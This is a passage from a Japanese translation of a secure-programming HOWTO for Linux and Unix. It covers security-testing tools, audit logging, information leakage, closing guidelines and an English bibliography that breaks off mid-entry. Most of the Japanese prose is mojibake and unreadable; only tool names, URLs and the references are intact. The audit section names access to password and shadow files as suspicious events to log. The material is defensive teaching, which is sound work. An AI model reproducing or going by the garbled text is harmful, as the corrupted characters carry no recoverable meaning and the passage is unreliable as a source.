    Mode Ƃ emacs x[X̃C^tF[Xgĕ\܂B cqual
    ̌o[ẂAC vȌ̐Ǝ㐫肻ȕ
    mł܂BOo[W cqual ł Carillon ́AC vO
    ɂ Y2K ֘ÃoO̂ɗp܂B\tgEFA
    GPL CZXŁA http://www.cs.berkeley.edu/Research/Aiken/cqual
    擾ł܂B
   
 E Cyclone  C CNȌŁAC ̃ZLeB̎_r̂
    ړIłB錾ꂩuƈSȁvɗ͂łڍs
    ܂BA͉ɂłɗ킯ł͂܂(͂悭
    ԈႢ̂ɖ𗧂܂񂪁AȂ̍l
    Ă킯ł͂܂)B 2001 N 12  John Viega has
    reviewed Cyclone <http://www.securityfocus.com/guest/9094>  John
    Viega ͎̂悤ɏqׂĂ܂BuCyclone ł邱
    ͂܂ȂłB C ňłAC ̎ǂȃp[
    Ă͂܂Bɂ炸ASmłƂ邱Ƃ񑩂Av
    O}{ɏdł邳܂܂ȋ@\Ă܂BcO
    Ȃ̂́ACyclone ͂܂嗬ƂȂׂĂ킯ł͂Ȃ_
    łB𖳂ȂA܂ Java(͕֗ȃc[g
    C)z悤ȗDʐ񋟂łĂȂ̂ŁA̖nȋZpg
    XN𕉂l͂܂B񐔔N̓ Cyclone ͔\͂̓_
     C ɋ낵߂ȂAnċłɂȂALT|[g
    錾ɂȂł傤B̂悤ȓ΁A C ̂ĂĂǂ
    Ǝvł傤vB Cyclone RpĆAGPL  LPGL ŃCZX
    Ă܂Bɏڂ́A Cyclone web site <http://
    www.research.att.com/projects/cyclone> ĂB
   
ʂ̉@ɃeXgp^쐬āAvO𓮂@܂
B̓vO_鎎݂ 1 łBc[
܂B

 E BFBTester(Brute Force Binary Tester)́AGPL CZXłB̃v
    O͐vɃoCivOɑ΂ăZLeB̃`FbN
    s܂B BFBTester ̓R}hC̒PƂ͕̈
    ϐ̃I[o[t[`FbNł܂Bo[W 2.0 ȏł̓e
    |t@C̍쐬悤Ƃ铮Ďł悤ɂȂ܂
    (SłȂe|t@CgĂȂ`FbN܂)
    BȑO BFBTester  Linux ł͓܂ł(Linux  POSIX X
    bh̎ɂZpIȖ)BAo[W 2.0.1 ł̓t
    BbNXĂ܂Bɏڂ́A http://
    bfbtester.sourceforge.net/ QƂĂB
   
 E fuzz <http://fuzz.sourceforge.net> ͑̃\tgEFAeXgc
    [łB̃eXǵA_ȃf[^ŃvOUăeX
    gȂ]܂BZLeBɌ肵c[ł͂܂B
   
삵ĂvO`āAR[hɂZLeB̖𔭌
悤Ƃc[񑶍݂܂B̃c[ɊŶ́AV
{bNfobK(gdb ̂悤)g[XvO(strace  ltrace
̂悤)łB炭܂育ȂƎv܂A Fenris <http://
razor.bindview.com/tools/fenris> (GPL CZX)ƂvO
܂BhLgɂ Fenris ̂ƂuoOgbNȒPɂ邽߂
AԂۑĕ͂AIɋtRpC@\肵
Aėpg[TłBZLeBčR[hAASYAvgR
𕪐͂܂BvO\̃g[X\ʂ̏ƂĎsp
XAAóAX񋟂܂vƂ܂B 1 
̌nŋ[vO܂B Subterfugue łB

ʓIɎ_Ȑi(ftp T[ot@CA[EH[)\z
ȂAZLeBXLc[𗧂̂͂킩肾Ǝv
܂BDꂽ̂ 1  Nessus <http://www.nessus.org> ܂B
ɂ̃c[܂B̎̃c[̓ObVEeXg
(AeXg)ŝɔɕ֗łBߋɓ肵ĂƎ㐫
̃XggĂ邩łBAVvO̖𔭌
̂ɂ́AɗƂ͂܂By󒐁FObVEeXgƂ́Av
ÔoO𒼂pŁA܂ʂ̃oOĂȂǂ
Am߂eXgw܂z

̃c[ĂяoāAՂSɎKvoĂP[X悭
܂B Open-Source PKI Book <http://ospkibook.sourceforge.net> ɂ
AJ(PKI)pɁAI[v\[X̃vOڂĂ
܂B

ASłȂvbgtH[̐ݒŁuSȁvvO𓮂
̂͂قƂǈӖ܂B낵΁AVXełɂ@
𒲍āAUɑ΂Ăhł悤ɃVXeݒA̓J
X^}CYĂB Linux Ȃ΁A Bastille Linux  http://
www.bastille-linux.org ŗpł܂B

 

10.8. Windows CE

Windows CE @SɂȂA Maricia Alforque ́uCreating a
Secure Windows CE Devicev http://msdn.microsoft.com/library/techart/
winsecurity.htm. ǂłB

 

10.9. čL^

vOZbVJnA͕sRȓ삪鎞ɂ́AčO
łBƂāAt⎞ԁAuidAeuidAgidAegidA[
AvZX idAR}hC̒lĂBčOƂ
̂ syslog(3)𗧂̂͂悭mĂ܂BÔVXéA
̏(ɖ𗧂܂)L^ł܂Ȁ̎舵ɒ
ӂȂƁAUɗpĂ܂_ȖłBŏIIɂ́A
U҂vOɑ͂𕔕IɃRg[܂BU҂
Ǝvf[^L^ɁAu\zʂv̕Xgݒ肵Au
\zʂvłȂ݂͂ȃGXP[vĂB΃O
悤ȂƂɂ͂Ȃ܂BȂƁA{ɍԂɂȂ
BƂ΃[U䕶(NIL  EOF) ƁAȎԂ
܂BƂ΁AU҂s𖄂ߍނƁAD݂̃OsƂƂ
邱ƂŁAŐL^˂ł܂BЂǂbłA̕
̃GXP[v́AWKiɉĂȂ悤łB URL GXP[vD
݂ł(%hh  hh ̓GXP[voCg 16 ilł)AC ̋Ki
߂ƂāÃGXP[v݂܂(\ooo  8 il \X  X ɂ͓
ʂȕ܂BƂ \n ͉sł)B܂ALbgg
(^I  control-I ł)܂A127 傫ȃoCgl͂܂
܂B 

[UT[rXۍU(͏ȂƂč̒~)N댯
܂B̍ÚAč폜鑽ʂ̃Cxg𔭐邱
ƂŁAVXeL^ۑ郊\[XHׂ܂B̍Uɑ΂
Ώ@ 1 ́AčL^鑬xɐ݂邱ƂłBӐ}Iɔ
xxAu܂ɑ́včL^΍폜܂BŰ^
̂ɑ΂ĂAxx悤ɂĂBA
PƂ̍U҂[Uł邩̂ƂĂP[X悭܂
B

񉽂usRȓvȂ̂Î́AvO̓Ɨ\
ĂgɍE܂BȑO_͂̃tB^`FbNɈ
P[X́ȂΏۂƂȂ܂ (Ƃ΁ANIL )Bʏ험p
RȂ͂́A炭Ô悢ł傤BƂ΁AK{
̃tB[h CGI vOɎs铙B /etc/passwd 
/etc/shadow ̂悤ȏ́AP[X񂠂܂Bl
Windows ́uWXgvt@C .pwl t@CɃANZX悤Ƃ
̂sRłB

čɃpX[hL^ȂłBāAʂ̃VXeɃpX
[hĂ܂ꍇ悭܂BƁApX[h̋L^
VXe̊Ǘ҂ɁAǊO̕ʂ̃Rs[^ւ̐NF߂邱Ƃ
Ȃ邩܂B

 

10.10. IȘRk

̃hLg̔ezbłARs[^ƒʐM@͂
̏R炵Ă邱ƂYȂłB̘Rk{ɈS
Ȃ̂Ƃ͍̂łBdgɕKvȂ̂mĂl͂
񂢂܂BRs[^fBXvCAL[{[hȂł镔i
o鍂ĝłBfBXvĆAꂽItBX̕
ɔ˂̂ł\ł [Kuhn 2002]Bf̃CgŒʐMs
Ă邱Ƃ͏\ɂ킩܂B

 

10.11. ̑

L̓éAZLeBEKChCȂ̂łAɂނł
̂łB

ȂƂÖꕔ́AvOŎOɃ`FbNĂ(
΁AvOJnƂ)BƂ΁AfBNgŁu
stickyvrbgĂ邱ƂOɂĂȂA{ɂȂĂ
邩eXgĂB̂悤ȃeXgɂ͎Ԃ͂܂񂵁A
ɂĐ[Ȗh͂łBꂼ̌ĂяoŃeXg
sԂ邱ƂCɂȂȂA߂ăCXg[ɍs悤ɂ
BAvP[VNɍsƂɗǂłB

gݍ݂ŃXNvggĂȂǍꂪϐݒ肵
AXNvgsvOɈe^邩܂B
͖hłB

GȐݒpꂪKvȂǍɃRgARgAE
gSȗႪ񂠂悤ɂĂBu#v̓RgƂĂ
g܂Áu̍s̎c̓RgvӖ܂B

Ȃׂ root  setuid  setgid vO쐬Ȃł
BɁA[Uɂ root ŃOC悤ɂĂB

R[hɓdqĂBp҂͑Ă̂pł
̂ǂ`FbNł܂B

S߂vO쐬ꍇ́AÓIɃNsƂ
Ă݂ĂBS߂vOINg
悤ɂ΁AIȃCũN@\_Uɑ΍Rł܂
B̕@ɂ͌_܂BgpfBXN⃁X
ɂ܂([`𕡐Rs[邩ł)BɈ̂́A
Cu̍XV(Ƃ΁AZLeB̐Ǝ㐫h) ʓ|ɂȂ
Ȃ_łBẴVXeł͎Iɂ͍XVłAƎɍXV
Ď邵܂B

R[h𒭂߂Ă鎞ɂ́AɃ}b`ȂP[XׂĂĂ
BƂ switch ꍇAǂ̃P[Xɂ}b`Ȃ
ǂȂ̂HuifvΏUɂȂꍇɂǂȂ̂H
ǂȂǁB

PɃt@Cu폜vĂAfBXNt@C̃f[^͏
BVXȇ́Au폜vAōėpł悤
ɂ܂B܂f[^ꎞIɑ̏ɒuĂꍇ悭܂(
 swap t@CAe|Et@CƂ)BہAU
ɑ΍Rɂ́Af[^̏㏑ł͏\ł͂܂BCfBA
ł̖ɂẮAÓTIȃhLgł Peter Gutmann 
́uSecure Deletion of Data from Magnetic and Solid-State Memoryv
<http://www-tac.cisco.com/Support_Library/field_alerts/fn13070.html> 
܂BU҂́Aʂ̎igƂł܂BƂ΁AR
s[^odgĎ(RVXéAdgK
ɏ]Aɑ΍RĂ܂)A閧ɍU܂(L[{[hɉB
Ďu)B

ZLeB̐Ǝ㐫C鎞ɂ́Auxv̒ǉlA(C
) Ǝ㐫NƂ鎎݂mÃO悤ɂĂ
B邱ƂŁAŰ@炵܂BUisĂ邱Ƃ
ɂȂ邱ƂŁAɍU҂Uł邩ǂAOɒׂ@
Ȃ܂B܂AƎ㐫NmVXeɂȂ킯łB́AF
؈ȑOɃT[ovÕo[WJƁAZLeBD܂
ȂƂĂ܂BJĂ܂ƁAU҂̃o[Wœ
삷UɍiĂ₷₷ƍUł邩łBvOɂ́A[U
ɑ΂Č̈ӂɃo[WuUvƂł̂܂B
ƍU҂́uԈvU邱ƂɂȂAUoł܂BƎ㐫
̓lbg[NŋN̂ŁAKZLeBEXLiŐƎ㐫m
悤ɂĂB Nessus(http://www.nessus.org) ƘAƂāA
ނ̃I[v\[XȃZLeBEXLioł邩ǂ
m߂ĂB΁A\tgEFAXVɖڒȃ[ÚAZ
LeB̐Ǝ㐫XL邱ƂŁAm邱ƂɂȂ܂(
Ƃ邩܂)B

ɂ́ÃhLĝ悤ȃZLeBKChCr[
B߂ Chapter 11 ɂ錋_͍ēǂĂBċCy
u͂߂Ɂv(Chapter 1)ɖ߂āAēǂ܂傤B

 

Chapter 11. _

                                    ̏I͎n߂ɂ܂BCʂ 
                                    Ĉ悢B         
                                                                       
                                       񐹏Rwǧt 7  8 
                                                                  (NIV)

Linux  Unix ̂悤 Unix CNȃVXeŁAɈSȃvO
݌vẾAۂƂĂƂłBɈSȃvO
ŔAlׂ͂ĂɓK؂ɑΉAGӂĂ邩
Ȃ[U䂵Ăɑ΂ĂAlɑΉȂ΂Ȃ
Ȃ_ɂ܂BS߂vO̊J҂́AgpĂ
vbgtH[ɂĐ[AKChC(̃hLg)
ׂēKpAiグvZX݂(sAEr[)AvO
̐ƎȂƂ炵čsKv܂B

ł͌_ƂāÃhLgŌƂȂKChC
Ă܂B

 E ׂ͂Č؂ĂB͂ɂ̓R}hC̓͂
    ACGI ̓͂܂Busȁv͂ۂȂł
    Bu󂯓v͂Ȃ̂`āA}b`Ȃ
    ۂĂB
   
 E obt@I[o[t[ĂBvO(ƒ
    ԃf[^l)ŐΏȂ悤ɂĂB_ł́Av
    O~Oł̃G[̑\iłB
   
 E vO̓\ƂĂBC^tF[XS
    āAŏɂAݒƃftHgSɂAtFCEZ
    [tɂĂBԂĂ(Ƃ΁A/tmp ̂
    ȋLfBNgňSɃt@CI[v)BMɑoH
    MĂ(Ƃ΁AقƂǂ̃T[óAZLeB`F
    bN┃ꉿî悤ȋ@f[^ނŁANCAgMĂ
    ܂)B
   
 E Ӑ[̃\[XĂяoĂBlK؂Ȃ̂ɐ(
    Ƀ^LN^֘A)AVXeR[̕ԂĺAׂă`FbN
    B
   
 E TdɏԂĂBɐMłȂ[Uɑ΂ẮAtB
    [hobN͍ŏɂAo͂ĂAxꍇɂΏ
    ĂB
   
 

 

Chapter 12. Ql

                                    ҂̌tׂ͂āA˂_BB 
                                    ЂƂ̖q҂ɗRAWƂ 
                                    WBȂA킪qA 
                                    SB͂LĂ肪 
                                    ȂBwтΑ̂B     
                                                                       
                                    񐹏Rwǧt 12  11A12
                                                                (NIV)

Web ŗpłZpIȘ_邱ƂɋĂ_ɒڂĂ
BWeb ł̎̋Zp̑啔pł܂B

[Advosys 2000] Advosys Consulting (formerly named Webber Technical
Services). Writing Secure Web Applications. http://advosys.ca/tips/
web-security.html

[Al-Herbish 1999] Al-Herbish, Thamer. 1999. Secure Unix Programming FAQ
. http://www.whitefang.com/sup.

[Aleph1 1996] Aleph1. November 8, 1996. ``Smashing The Stack For Fun
And Profit''. Phrack Magazine. Issue 49, Article 14. http://
www.phrack.com/search.phtml?view&article=p49-14 or alternatively http:/
/www.2600.net/phrack/p49-14.html.

[Anonymous 1999] Anonymous. October 1999. Maximum Linux Security: A
Hacker's Guide to Protecting Your Linux Server and Workstation Sams.
ISBN: 0672316706.

[Anonymous 1998] Anonymous. September 1998. Maximum Security : A
Hacker's Guide to Protecting Your Internet Site and Network. Sams.
Second Edition. ISBN: 0672313413.

[AUSCERT 1996] Australian Computer Emergency Response Team (AUSCERT)
and O'Reilly. May 23, 1996 (rev 3C). A Lab Engineers Check List for
Writing Secure Unix Code. ftp://ftp.auscert.org.au/pub/auscert/papers/
secure_programming_checklist

[Bach 1986] Bach, Maurice J. 1986. The Design of the Unix Operating
System. Englewood Cliffs, NJ: Prentice-Hall, Inc. ISBN 0-13-201799-7
025.

[Bellovin 1989] Bellovin, Steven M. April 1989. "Security Problems in
the TCP/IP Protocol Suite" Computer Communications Review 2:19, pp.
32-48. http://www.research.att.com/~smb/papers/ipext.pdf

[Bellovin 1994] Bellovin, Steven M. December 1994. Shifting the Odds --
Writing (More) Secure Software. Murray Hill, NJ: AT&T Research. http://
www.research.att.com/~smb/talks

[Bishop 1996] Bishop, Matt. May 1996. ``UNIX Security: Security in
Programming''. SANS '96. Washington DC (May 1996). http://
olympus.cs.ucdavis.edu/~bishop/secprog.html

[Bishop 1997] Bishop, Matt. October 1997. ``Writing Safe Privileged
Programs''. Network Security 1997 New Orleans, LA. http://
olympus.cs.ucdavis.edu/~bishop/secprog.html

[Blaze 1996] Blaze, Matt, Whitfield Diffie, Ronald L. Rivest, Bruce
Schneier, Tsutomu Shimomura, Eric Thompson, and Michael Wiener. January
1996. ``Minimal Key Lengths for Symmetric Ciphers to Provide Adequate
Commercial Security: A Report by an Ad Hoc Group of Cryptographers and
Computer Scientists.'' ftp://ftp.research.att.com/dist/mab/
keylength.txt and ftp://ftp.research.att.com/dist/mab/keylength.ps.

[CC 1999] The Common Criteria for Information Technology Security
Evaluation (CC). August 1999. Version 2.1. Technically identical to
International Standard ISO/IEC 15408:1999. http://csrc.nist.gov/cc/
ccv20/ccv2list.htm

[CERT 1998] Computer Emergency Response Team (CERT) Coordination Center
(CERT/CC). February 13, 1998. Sanitizing User-Supplied Data in CGI
Scripts. CERT Advisory CA-97.25.CGI_metachar. http://www.cert.org/
advisories/CA-97.25.CGI_metachar.html.

[Clowes 2001] Clowes, Shaun. 2001. ``A Study In Scarlet - Exploiting
Common Vulnerabilities in PHP'' http://www.securereality.com.au/
archives.html

[CMU 1998] Carnegie Mellon University (CMU). February 13, 1998 Version
1.4. ``How To Remove Meta-characters From User-Supplied Data In CGI
Scripts''. ftp://ftp.cert.org/pub/tech_tips/cgi_metacharacters.

[Cowan 1999] Cowan, Crispin, Perry Wagle, Calton Pu, Steve Beattie, and
Jonathan Walpole. ``Buffer Overflows: Attacks and Defenses for the
Vulnerability of the Decade''. Proceedings of DARPA Information
Survivability Conference and Expo (DISCEX), http://
schafercorp-ballston.com/discex SANS 2000. http://www.sans.org/newlook/
events/sans2000.htm. For a copy, see http://immunix.org/
documentation.html.

[Cox 2000] Cox, Philip. March 30, 2001. Hardening Windows 2000. http://
www.systemexperts.com/win2k/hardenW2K11.pdf.

[Dobbertin 1996]. Dobbertin, H. 1996. The Status of MD5 After a Recent
Attack. RSA Laboratories' CryptoBytes. Vol. 2, No. 2.

[Felten 1997] Edward W. Felten, Dirk Balfanz, Drew Dean, and Dan S.
Wallach. Web Spoofing: An Internet Con Game Technical Report 540-96
(revised Feb. 1997) Department of Computer Science, Princeton
University http://www.cs.princeton.edu/sip/pub/spoofing.pdf

[Fenzi 1999] Fenzi, Kevin, and Dave Wrenski. April 25, 1999. Linux
Security HOWTO. Version 1.0.2. http://www.linuxdoc.org/HOWTO/
Security-HOWTO.html

[FHS 1997] Filesystem Hierarchy Standard (FHS 2.0). October 26, 1997.
Filesystem Hierarchy Standard Group, edited by Daniel Quinlan. Version
2.0. http://www.pathname.com/fhs.

[Filipski 1986] Filipski, Alan and James Hanko. April 1986. ``Making
Unix Secure.'' Byte (Magazine). Peterborough, NH: McGraw-Hill Inc. Vol.
11, No. 4. ISSN 0360-5280. pp. 113-128.

[Flake 2001] Flake, Havlar. Auditing Binaries for Security
Vulnerabilities. http://www.blackhat.com/html/win-usa-01/
win-usa-01-speakers.html.

[FOLDOC] Free On-Line Dictionary of Computing. http://
foldoc.doc.ic.ac.uk/foldoc/index.html.

[Forristal 2001] Forristal, Jeff, and Greg Shipley. January 8, 2001.
Vulnerability Assessment Scanners. Network Computing. http://
www.nwc.com/1201/1201f1b1.html

[FreeBSD 1999] FreeBSD, Inc. 1999. ``Secure Programming Guidelines''. 
FreeBSD Security Information. http://www.freebsd.org/security/
security.html

[FSF 1998] Free Software Foundation. December 17, 1999. Overview of the
GNU Project. http://www.gnu.ai.mit.edu/gnu/gnu-history.html

[FSF 1999] Free Software Foundation. January 11, 1999. The GNU C
Library Reference Manual. Edition 0.08 DRAFT, for Version 2.1 Beta of
the GNU C Library. Available at, for example, http://www.netppl.fi/~pp/
glibc21/libc_toc.html

Fu, Kevin, Emil Sit, Kendra Smith, and Nick Feamster. August 2001.
``Dos and Don'ts of Client Authentication on the Web''. Proceedings of
the 10th USENIX Security Symposium, Washington, D.C., August 2001. 
http://cookies.lcs.mit.edu/pubs/webauth.html.

[Gabrilovich 2002] Gabrilovich, Evgeniy, and Alex Gontmakher. February
2002. ``Inside Risks: The Homograph Attack''. Communications of the
ACM. Volume 45, Number 2. Page 128. 

[Galvin 1998a] Galvin, Peter. April 1998. ``Designing Secure
Software''. Sunworld. http://www.sunworld.com/swol-04-1998/
swol-04-security.html.

[Galvin 1998b] Galvin, Peter. August 1998. ``The Unix Secure
Programming FAQ''. Sunworld. http://www.sunworld.com/sunworldonline/
swol-08-1998/swol-08-security.html

[Garfinkel 1996] Garfinkel, Simson and Gene Spafford. April 1996. 
Practical UNIX & Internet Security, 2nd Edition. ISBN 1-56592-148-8.
Sebastopol, CA: O'Reilly & Associates, Inc. http://www.oreilly.com/
catalog/puis

[Garfinkle 1997] Garfinkle, Simson. August 8, 1997. 21 Rules for
Writing Secure CGI Programs. http://webreview.com/wr/pub/97/08/08/
bookshelf

[Gay 2000] Gay, Warren W. October 2000. Advanced Unix Programming.
Indianapolis, Indiana: Sams Publishing. ISBN 0-67231-990-X.

[Geodsoft 2001] Geodsoft. February 7, 2001. Hardening OpenBSD Internet
Servers. http://www.geodsoft.com/howto/harden.

[Graham 1999] Graham, Jeff. May 4, 1999. Security-Audit's Frequently
Asked Questions (FAQ). http://lsap.org/faq.txt

[Gong 1999] Gong, Li. June 1999. Inside Java 2 Platform Security.
Reading, MA: Addison Wesley Longman, Inc. ISBN 0-201-31000-7.

[Gundavaram Unknown] Gundavaram, Shishir, and Tom Christiansen. Date
Unknown. Perl CGI Programming FAQ. http://language.perl.com/CPAN/doc/
FAQs/cgi/perl-cgi-faq.html

[Hall "Beej" 1999] Hall, Brian "Beej". Beej's Guide to Network
Programming Using Internet Sockets. 13-Jan-1999. Version 1.5.5. http://
www.ecst.csuchico.edu/~beej/guide/net

[ISO 12207] International Organization for Standardization (ISO). 1995.
Information technology -- Software life cycle processes ISO/IEC 12207:
1995.

[ISO 13335] International Organization for Standardization (ISO). ISO/
IEC TR 13335. Guidelines for the Management of IT Security (GMITS).
Note that this is a five-part technical report (not a standard); see
also ISO/IEC 17799:2000. It includes:

 E ISO 13335-1: Concepts and Models for IT Security
   
 E ISO 13335-2: Managing and Planning IT Security
   
 E ISO 13335-3: Techniques for the Management of IT Security
   
 E ISO 13335-4: Selection of Safeguards
   
 E ISO 13335-5: Safeguards for External Connections
   
[ISO 17799] International Organization for Standardization (ISO).
December 2000. Code of Practice for Information Security Management.
ISO/IEC 17799:2000.

[ISO 9000] International Organization for Standardization (ISO). 2000.
Quality management systems - Fundamentals and vocabulary. ISO 9000:
2000. See http://www.iso.ch/iso/en/iso9000-14000/iso9000/selection_use/
iso9000family.html

[ISO 9000] International Organization for Standardization (ISO). 2000.
Quality management systems - Requirements ISO 9001:2000

[Jones 2000] Jones, Jennifer. October 30, 2000. ``Banking on Privacy''.
InfoWorld, Volume 22, Issue 44. San Mateo, CA: International Data Group
(IDG). pp. 1-12.

[Kelsey 1998] Kelsey, J., B. Schneier, D. Wagner, and C. Hall. March
1998. "Cryptanalytic Attacks on Pseudorandom Number Generators." Fast
Software Encryption, Fifth International Workshop Proceedings (March
1998), Springer-Verlag, 1998, pp. 168-188. http://www.counterpane.com/
pseudorandom_number.html.

[Kernighan 1988] Kernighan, Brian W., and Dennis M. Ritchie. 1988. The
C Programming Language. Second Edition. Englewood Cliffs, NJ:
Prentice-Hall. ISBN 0-13-110362-8.

[Kim 1996] Kim, Eugene Eric. 1996. CGI Developer's Guide. SAMS.net
Publishing. ISBN: 1-57521-087-8 http://www.eekim.com/pubs/cgibook

[Kuchling 2000]. Kuchling, A.M. 2000. Restricted Execution HOWTO. http:
//www.python.org/doc/howto/rexec/rexec.html

[Kuhn 2002] Kuhn, Markus G. Optical Time-Domain Eavesdropping Risks of
CRT displays. Proceedings of the 2002 IEEE Symposium on Security and
Privacy, Oakland, CA, May 12-15, 2002. http://www.cl.cam.ac.uk/~mgk25/
ieee02-optical.pdf

[LSD 2001] The Last Stage of Delirium. July 4, 2001. UNIX Assembly
Codes Development for Vulnerabilities Illustration Purposes. http://
lsd-pl.net/papers.html#assembly.

[McClure 1999] McClure, Stuart, Joel Scambray, and George Kurtz. 1999. 
Hacking Exposed: Network Security Secrets and Solutions. Berkeley, CA:
Osbourne/McGraw-Hill. ISBN 0-07-212127-0.

[McKusick 1999] McKusick, Marshall Kirk. January 1999. ``Twenty Years
of Berkeley Unix: From AT&T-Owned to Freely Redistributable.'' Open
Sources: Voices from the Open Source Revolution. http://www.oreilly.com
/catalog/opensources/book/kirkmck.html.

[McGraw 1999] McGraw, Gary, and Edward W. Felten. December 1998. Twelve
Rules for developing more secure Java code. Javaworld. http://
www.javaworld.com/javaworld/jw-12-1998/jw-12-securityrules.html.

[McGraw 1999] McGraw, Gary, and Edward W. Felten. January 25, 1999.
Securing Java: Getting Down to Business with Mobile Code, 2nd Edition
John Wiley & Sons. ISBN 047131952X. http://www.securingjava.com.

[McGraw 2000a] McGraw, Gary and John Viega. March 1, 2000. Make Your
Software Behave: Learning the Basics of Buffer Overflows. http://
www-4.ibm.com/software/developer/library/overflows/index.html.

[McGraw 2000b] McGraw, Gary and John Viega. April 18, 2000. Make Your
Software Behave: Software strategies In the absence of hardware, you
can devise a reasonably secure random number generator through
software. http://www-106.ibm.com/developerworks/library/randomsoft/
index.html?dwzone=security.

[Miller 1995] Miller, Barton P., David Koski, Cjin Pheow Lee,
Vivekananda Maganty, Ravi Murthy, Ajitkumar Natarajan, and Jeff Steidl.
1995. Fuzz Revisited: A Re-examination of the Reliability of UNIX
Utilities and Services. ftp://grilled.cs.wisc.edu/technical_papers/
fuzz-revisited.pdf.

[Miller 1999] Miller, Todd C. and Theo de Raadt. ``strlcpy and strlcat
-- Consistent, Safe, String Copy and Concatenation'' Proceedings of
Usenix '99. http://www.usenix.org/events/usenix99/millert.html and 
http://www.usenix.org/events/usenix99/full_papers/millert/PACKING_LIST

[Mudge 1995] Mudge. October 20, 1995. How to write Buffer Overflows.
l0pht advisories. http://www.l0pht.com/advisories/bufero.html.

[Murhammer 1998] Murhammer, Martin W., Orcun Atakan, Stefan Bretz,
Larry R. Pugh, Kazunari Suzuki, and David H. Wood. October 1998. TCP/IP
Tutorial and Technical Overview IBM International Technical Support
Organization. http://www.redbooks.ibm.com/pubs/pdfs/redbooks/
gg243376.pdf

[NCSA] NCSA Secure Programming Guidelines. http://www.ncsa.uiuc.edu/
General/Grid/ACES/security/programming.

Neumann, Peter. 2000. "Robust Nonproprietary Software." Proceedings of
the 2000 IEEE Symposium on Security and Privacy (the ``Oakland
Conference''), May 14-17, 2000, Berkeley, CA. Los Alamitos, CA: IEEE
Computer Society. pp.122-123.

National Security Agency (NSA). September 2000. Information Assurance
Technical Framework (IATF). http://www.iatf.net.

[Open Group 1997] The Open Group. 1997. Single UNIX Specification,
Version 2 (UNIX 98). http://www.opengroup.org/online-pubs?DOC=007908799
.

[OSI 1999]. Open Source Initiative. 1999. The Open Source Definition. 
http://www.opensource.org/osd.html.

[Opplinger 1998] Oppliger, Rolf. 1998. Internet and Intranet Security.
Norwood, MA: Artech House. ISBN 0-89006-829-1.

[Paulk 1993a] Mark C. Paulk, Bill Curtis, Mary Beth Chrissis, and
Charles V. Weber. Capability Maturity Model for Software, Version 1.1.
Software Engineering Institute, CMU/SEI-93-TR-24. DTIC Number
ADA263403, February 1993. http://www.sei.cmu.edu/activities/cmm/
obtain.cmm.html.

[Paulk 1993b] Mark C. Paulk, Charles V. Weber, Suzanne M. Garcia, Mary
Beth Chrissis, and Marilyn W. Bush. Key Practices of the Capability
Maturity Model, Version 1.1. Software Engineering Institute. CMU/
SEI-93-TR-25, DTIC Number ADA263432, February 1993.

[Peteanu 2000] Peteanu, Razvan. July 18, 2000. Best Practices for
Secure Web Development. http://members.home.net/razvan.peteanu

[Pfleeger 1997] Pfleeger, Charles P. 1997. Security in Computing. Upper
Saddle River, NJ: Prentice-Hall PTR. ISBN 0-13-337486-6.

[Phillips 1995] Phillips, Paul. September 3, 1995. Safe CGI Programming
. http://www.go2net.com/people/paulp/cgi-security/safe-cgi.txt

[Quintero 1999] Quintero, Federico Mena, Miguel de Icaza, and Morten
Welinder GNOME Programming Guidelines http://developer.gnome.org/doc/
guides/programming-guidelines/book1.html

[Raymond 1997] Raymond, Eric. 1997. The Cathedral and the Bazaar. http:
//www.tuxedo.org/~esr/writings/cathedral-bazaar

[Raymond 1998] Raymond, Eric. April 1998. Homesteading the Noosphere. 
http://www.tuxedo.org/~esr/writings/homesteading/homesteading.html

[Ranum 1998] Ranum, Marcus J. 1998. Security-critical coding for
programmers - a C and UNIX-centric full-day tutorial. http://
www.clark.net/pub/mjr/pubs/pdf/.

[RFC 822] August 13, 1982 Standard for the Format of ARPA Internet Text
Messages. IETF RFC 822. http://www.ietf.org/rfc/rfc0822.txt.

[rfp 1999] rain.forest.puppy. 1999. ``Perl CGI problems''. Phrack
Magazine. Issue 55, Article 07. http://www.phrack.com/search.phtml?view
&article=p55-7 or http://www.insecure.org/news/P55-07.txt.

[Rijmen 2000] Rijmen, Vincent. "LinuxSecurity.com Speaks With AES
Winner". http://www.linuxsecurity.com/feature_stories/
interview-aes-3.html.

[Rochkind 1985]. Rochkind, Marc J. Advanced Unix Programming. Englewood
Cliffs, NJ: Prentice-Hall, Inc. ISBN 0-13-011818-4.

[St. Laurent 2000] St. Laurent, Simon. February 2000. XTech 2000
Conference Reports. ``When XML Gets Ugly''. http://www.xml.com/pub/2000
/02/xtech/megginson.html.

[Saltzer 1974] Saltzer, J. July 1974. ``Protection and the Control of
Information Sharing in MULTICS''. Communications of the ACM. v17 n7.
pp. 388-402.

[Saltzer 1975] Saltzer, J., and M. Schroeder. September 1975. ``The
Protection of Information in Computing Systems''. Proceedings of the
IEEE. v63 n9. pp. 1278-1308. http://www.mediacity.com/~norm/CapTheory/
ProtInf. Summarized in [Pfleeger 1997, 286].

Schneider, Fred B. 2000. "Open Source in Security: Visting the
Bizarre." Proceedings of the 2000 IEEE Symposium on Security and
Privacy (the ``Oakland Conference''), May 14-17, 2000, Berkeley, CA.
Los Alamitos, CA: IEEE Computer Society. pp.126-127.

[Schneier 1996] Schneier, Bruce. 1996. Applied Cryptography, Second
Edition: Protocols, Algorithms, and Source Code in C. New York: John
Wiley and Sons. ISBN 0-471-12845-7.

[Schneier 1998] Schneier, Bruce and Mudge. November 1998. Cryptanalysis
of Microsoft's Point-to-Point Tunneling Protocol (PPTP) Proceedings of
the 5th ACM Conference on Communications and Computer Security, ACM
Press. http://www.counterpane.com/pptp.html.

[Schneier 1999] Schneier, Bruce. September 15, 1999. ``Open Source and
Security''. Crypto-Gram. Counterpane Internet Security, Inc. http://
www.counterpane.com/crypto-gram-9909.html

[Seifried 1999] Seifried, Kurt. October 9, 1999. Linux Administrator's
Security Guide. http://www.securityportal.com/lasg.

[Seifried 2001] Seifried, Kurt. September 2, 2001. WWW Authentication 
http://www.seifried.org/security/www-auth/index.html.

[Shankland 2000] Shankland, Stephen. ``Linux poses increasing threat to
Windows 2000''. CNET. http://news.cnet.com/news/0-1003-200-1549312.html

[Shostack 1999] Shostack, Adam. June 1, 1999. Security Code Review
Guidelines. http://www.homeport.org/~adam/review.html.

[Sibert 1996] Sibert, W. Olin. Malicious Data and Computer Security.
(NIST) NISSC '96. http://www.fish.com/security/maldata.html 

[Sitaker 1999] Sitaker, Kragen. Feb 26, 1999. How to Find Security
Holes http://www.pobox.com/~kragen/security-holes.html and http://
www.dnaco.net/~kragen/security-holes.html

[SSE-CMM 1999] SSE-CMM Project. April 1999. Systems Security
